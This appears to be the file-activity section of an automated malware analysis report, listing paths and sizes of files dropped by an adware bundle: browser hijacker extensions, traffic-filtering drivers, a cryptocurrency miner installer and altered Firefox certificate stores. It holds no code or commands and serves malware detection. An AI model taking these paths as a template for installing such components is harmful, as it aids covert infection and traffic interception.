    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\es-419\locale.properties (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\loading.gif (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\quick_start.xul (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\close.png (3 bytes)
    %Program Files% (x86)\Mozilla Firefox\browser\searchplugins\istartsurf.xml (553 bytes)
    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\ru-MO\locale.properties (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\Thumbs.db (27 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\remoterequest.js (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\zh-CN\locale.properties (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\81A.tmp (110 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\defaults\preferences\fvd.js (7 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\fr-CA\locale.properties (2 bytes)
    %Program Files% (x86)\WNet\ssfilterdrv.sys (1856 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssEEA4.tmp\SimpleSC.dll (1921 bytes)
    C:\Windows\System32\drivers\ssfilterdrv.sys (51 bytes)
    %Program Files% (x86)\WNet\uninst.exe (2792 bytes)
    %Program Files% (x86)\WNet\nfregdrv.exe (1601 bytes)
    %Program Files% (x86)\WNet\ProtocolFilters.dll (9320 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsmEDE7.tmp (70570 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssEEA4.tmp\SelfDel.dll (13 bytes)
    %Program Files% (x86)\WNet\ssleay32.dll (12088 bytes)
    %Program Files% (x86)\WNet\WNet.exe (15606 bytes)
    %Program Files% (x86)\WNet\libeay32.dll (35507 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssEEA4.tmp\System.dll (23 bytes)
    %Program Files% (x86)\WNet\nfapi.dll (4992 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\error[2] (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\error[2] (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp\registry.dll (812 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp\System.dll (23 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\verificar_ip[1].htm (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\310714_gs[1] (61315 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvt_mb_1.exe (2736 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\310714_am2[1].exe (18984 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp\inetc.dll (808 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\310714_is.exe (45524 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cr.exe (64441 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\310714_cr[1] (61024 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsmD143.tmp (3145 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_gs.exe (64732 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_br.exe (64846 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_ps.exe (34340 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_a9.exe (33323 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\310714_mb[1] (1928 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\240714_ps[1].exe (32080 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_nj.exe (127352 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\warning[1] (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\310714_is[1] (42448 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_am2.exe (20815 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\s9[1].gif (43 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cp.exe (7390 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\310714_br[1].exe (61429 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\310714_cp[1].exe (5984 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\310714_a9[1].exe (31080 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp\nsWeb.dll (20 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\291014_nj[1].exe (119929 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2KY9FDOQT8H9H3WIW6VT.temp (196 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LCWG3ST52CQ8BWKM1ZUM.temp (196 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\749D80PVBSBBMHTBLUY1.temp (196 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\awhED6B.tmp (112516 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\awhEA2F.tmp (172 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amisetup2899__9664.exe (872 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\System.dll (23 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\checks.txt (253 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\amisid.exe (1921 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\cpuminer-x11opt-setup.exe (151433 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\post_reply.htm (14 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\inetc.dll (808 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B7.tmp (3040 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\md5dll.dll (14 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\registry.dll (812 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\cpuminer-x11opt-setup[1].exe (142739 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\nsisos.dll (13 bytes)
    %Program Files% (x86)\XTab\web\img\loading.gif (5 bytes)
    %Program Files% (x86)\XTab\skin\btn.png (2 bytes)
    %Program Files% (x86)\XTab\install.data (68 bytes)
    %Program Files% (x86)\XTab\web\_locales\zh-CN\messages.json (3 bytes)
    %Program Files% (x86)\XTab\web\_locales\en-US\messages.json (3 bytes)
    %Program Files% (x86)\XTab\HPNotify.exe (18514 bytes)
    %Program Files% (x86)\XTab\conf (1626 bytes)
    %Program Files% (x86)\XTab\ffsearch_toolbar!1.0.0.1031.xpi (15 bytes)
    %Program Files% (x86)\XTab\BrowerWatchFF.dll (23 bytes)
    %Program Files% (x86)\XTab\web\_locales\es-419\messages.json (3 bytes)
    %Program Files% (x86)\XTab\web\indexIE8.html (1794 bytes)
    %Program Files% (x86)\XTab\web\js\library.js (4216 bytes)
    %Program Files% (x86)\XTab\web\_locales\pt\messages.json (4 bytes)
    %Program Files% (x86)\XTab\web\ver.txt (47 bytes)
    %Program Files% (x86)\XTab\web\_locales\fr-BE\messages.json (3 bytes)
    %Program Files% (x86)\XTab\skin\input_bk.png (2 bytes)
    %Program Files% (x86)\XTab\web\_locales\pl\messages.json (3 bytes)
    %Program Files% (x86)\XTab\web\_locales\it-IT\messages.json (4 bytes)
    %Program Files% (x86)\XTab\skin\conf_back.png (1623 bytes)
    %Program Files% (x86)\XTab\web\_locales\fr-CA\messages.json (3 bytes)
    %Program Files% (x86)\XTab\uninstall.exe (1343 bytes)
    %Program Files% (x86)\XTab\skin\btn_apply.png (6 bytes)
    %Program Files% (x86)\XTab\skin\conf.xml (8 bytes)
    %Program Files% (x86)\XTab\web\indexIE.html (1 bytes)
    %Program Files% (x86)\XTab\web\_locales\ru-MO\messages.json (4 bytes)
    %Program Files% (x86)\XTab\web\js\xagainit-ie8.js (4 bytes)
    %Program Files% (x86)\XTab\skin\about_bk.png (1436 bytes)
    %Program Files% (x86)\XTab\web\_locales\es-ES\messages.json (3 bytes)
    %Program Files% (x86)\XTab\skin\main.xml (4 bytes)
    %Program Files% (x86)\XTab\web\img\icon48.png (3 bytes)
    %Program Files% (x86)\XTab\BrowserAction.dll (33992 bytes)
    %Program Files% (x86)\XTab\skin\radio_2.png (3 bytes)
    %Program Files% (x86)\XTab\searchProvider.xml (8 bytes)
    %Program Files% (x86)\XTab\web\_locales\it-CH\messages.json (3 bytes)
    %Program Files% (x86)\XTab\ProtectService.exe (5469 bytes)
    %Program Files% (x86)\XTab\web\js\js.js (18 bytes)
    %Program Files% (x86)\XTab\skin\logo.png (5 bytes)
    %Program Files% (x86)\XTab\web\js\xagainit2.0.js (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsn5B4A.tmp\System.dll (23 bytes)
    %Program Files% (x86)\XTab\web\main.css (19 bytes)
    %Program Files% (x86)\XTab\web\_locales\vi-VI\messages.json (4 bytes)
    %Program Files% (x86)\XTab\web\_locales\ru\messages.json (4 bytes)
    %Program Files% (x86)\XTab\skin\close.png (3 bytes)
    %Program Files% (x86)\XTab\web\data.html (20 bytes)
    %Program Files% (x86)\XTab\web\img\logo32.ico (4 bytes)
    %Program Files% (x86)\XTab\web\img\icon128.png (9 bytes)
    %Program Files% (x86)\XTab\web\js\jquery.autocomplete.js (12 bytes)
    %Program Files% (x86)\XTab\skin\about.png (4 bytes)
    %Program Files% (x86)\XTab\BrowerWatchCH.dll (23 bytes)
    %Program Files% (x86)\XTab\web\_locales\fr-FR\messages.json (3 bytes)
    %Program Files% (x86)\XTab\web\img\icon16.png (628 bytes)
    %Program Files% (x86)\XTab\web\_locales\fr-CH\messages.json (3 bytes)
    %Program Files% (x86)\XTab\skin\settings.png (5 bytes)
    %Program Files% (x86)\XTab\web\js\jquery-1.11.0.min.js (4726 bytes)
    %Program Files% (x86)\XTab\web\_locales\fr-LU\messages.json (3 bytes)
    %Program Files% (x86)\XTab\web\js\ga.js (1568 bytes)
    %Program Files% (x86)\XTab\web\js\common.js (2 bytes)
    %Program Files% (x86)\XTab\web\_locales\tr-TR\messages.json (4 bytes)
    %Program Files% (x86)\XTab\SupTab.dll (15928 bytes)
    %Program Files% (x86)\XTab\IeWatchDog.dll (20 bytes)
    %Program Files% (x86)\XTab\web\_locales\pt-BR\messages.json (4 bytes)
    %Program Files% (x86)\XTab\web\img\google_trends.png (7 bytes)
    %Program Files% (x86)\XTab\web\_locales\zh-TW\messages.json (3 bytes)
    %Program Files% (x86)\XTab\skin\rigth_arrow.png (2 bytes)
    %Program Files% (x86)\XTab\skin\radio_1.png (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\close.png (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tCE1709AA862C234DD936mp.tmp (144 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\bg.png (5064 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code1.jpg (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\unchecked.png (135 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\Thumbs.db (784 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\checkbox_select.png (783 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\conf (79 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\bk_shadow.png (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\quick_searchff#5.4.10.xpi (6360 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\button1.png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code4.jpg (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\scrollbar.bmp (1552 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\button.png (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\2[1].zip (213534 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\479.json (512 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\one.zip (29636 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\FBFDE863-3C17-4B82-A5D1-9B8ED5BE6B40.tmp (20 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\535559167_198339_B48A115F[1].htm (72 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\two.zip (74342 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code6.jpg (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\1[1].zip (178958 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\loading_bg.png (159 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\MessageBox.xml (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\sweetsearch!1.0.0.1031.xpi (15 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\min.png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\bg1.png (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\535559167_198339_B48A115F[1].htm (72 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\Thumbs.db (1552 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code2.jpg (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\UninstallManager.exe (60186 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\DataBase (26688 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code3.jpg (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\uninstallDlg2.xml (15 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\checkbox.png (545 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code5.jpg (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\checked.png (222 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\loading_light.png (139 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\QQBrowser.exe (5199 bytes)
    %Program Files% (x86)\GOSafer\gosafer.exe (15982 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsmF596.tmp\SimpleSC.dll (1921 bytes)
    %Program Files% (x86)\GOSafer\ssleay32.dll (12088 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsmF596.tmp\SelfDel.dll (13 bytes)
    %Program Files% (x86)\GOSafer\nfapi.dll (4992 bytes)
    %Program Files% (x86)\GOSafer\nfregdrv.exe (1601 bytes)
    %Program Files% (x86)\GOSafer\gosaferdrv.sys (1856 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsmF596.tmp\System.dll (23 bytes)
    C:\Windows\System32\drivers\gosaferdrv.sys (51 bytes)
    %Program Files% (x86)\GOSafer\uninst.exe (1793 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssF4BB.tmp (67374 bytes)
    %Program Files% (x86)\GOSafer\ProtocolFilters.dll (9320 bytes)
    %Program Files% (x86)\GOSafer\libeay32.dll (35507 bytes)
    %Program Files% (x86)\CashReminder\nfapi.dll (118 bytes)
    %Program Files% (x86)\CashReminder\ProtocolFilters.dll (249 bytes)
    C:\Windows\Temp\P_StoreList.txt (784 bytes)
    C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\rules[2].txt (265 bytes)
    C:\Windows\Temp\CashReminder\mfs162E.tmp (3516 bytes)
    C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\stores[1].htm (784 bytes)
    C:\Windows\Temp\CashReminder\mfs310F.tmp (229227 bytes)
    %Program Files% (x86)\CashReminder\libeay32.dll (35507 bytes)
    C:\Windows\System32\drivers\crfilterdrv.sys (51 bytes)
    %Program Files% (x86)\CashReminder\nfregdrv.exe (1601 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscDFF3.tmp (66830 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE0AF.tmp\System.dll (23 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE0AF.tmp\SimpleSC.dll (1921 bytes)
    %Program Files% (x86)\CashReminder\CashReminder.exe (15982 bytes)
    %Program Files% (x86)\CashReminder\uninstall.exe (1568 bytes)
    %Program Files% (x86)\CashReminder\ssleay32.dll (12088 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE0AF.tmp\SelfDel.dll (13 bytes)
    %Program Files% (x86)\CashReminder\crfilterdrv.sys (1856 bytes)
    C:\Windows\Temp\ActSys\SSL\NJax Intermediate.cer (774 bytes)
    C:\Windows\Temp\ActSys\SSL\cert.db (2 bytes)
    C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\rules[4].txt (197 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\cert8.db (7444 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\key3.db (520 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\UserInfo.dll (8 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\NSISEncrypt.dll (3323 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\nsJSON.dll (15 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Plain Savings\lm (128 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\inetc.dll (44 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\System.dll (23 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\WmiInspector.dll (3137 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\IpConfig.dll (4254 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Plain Savings\tlg (41 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Plain Savings\mj (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\nsExec.dll (14 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amipixel.cfg (107 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\index[1].htm (1199 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amisetup2899__9664.exe:typelib (8 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amitest.txt (27 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\amipb[1].js (21314 bytes)
    C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\rules[3].txt (16 bytes)
    C:\Windows\Temp\G_RuleList.txt (16 bytes)
    C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\rules[1].txt (111 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\images\button-bg.png (131 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\ProgressBar.png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\logo_new[1].png (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Close_Hover.png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\bootstrap_42881.html (156 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\button.css (417 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\declineBG[1].png (461 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Loader.gif (10 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\Yes_Button[1].png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ICReinstall_310714_is.exe (1380 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT (592 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\images\progress-bg2.png (978 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\No_Button_Hover[1].png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\Rerarapepe_b[1].png (384 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\images\progress-bg.png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\Yes_Button_Hover[1].png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\Rerarapepe[1].png (922 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\2E398934_stp.CIS.part (612 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\2E398934_stp\icc.dll (212 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\progress-bar.css (506 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\ironsrc_prot[1].png (364 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00063B3B.log (8 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\csshover3.htc (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\Rerarapepe3[1].jpg (800 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Button.png (1 bytes)
    %Program Files% (x86)\is383871.log (9 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005D99C.log (8 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\2E398934_stp\sqlite3.dll (643 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\sponsored.png (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\ie6_main.css (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Button_Hover.png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\images\progress-bg-corner.png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\15094FED_stp.EXE.part (381 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005D92E.log (8 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\RerarapepeV2_BG4[1].jpg (2178 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\form.bmp.Mask (244 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\locale\ES.locale (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\isf_383810.flat (751 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\browse.css (337 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005ED98.log (8 bytes)
